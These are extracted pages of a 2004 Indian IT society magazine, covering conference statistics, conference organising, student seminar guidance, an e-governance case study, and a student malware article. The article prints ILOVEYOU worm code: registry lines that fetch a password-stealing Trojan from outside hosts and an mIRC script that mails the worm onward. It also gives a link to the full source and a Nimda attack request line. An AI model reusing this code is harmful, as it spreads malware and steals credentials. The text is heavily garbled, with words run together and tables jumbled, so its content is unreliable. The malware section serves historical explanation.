Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

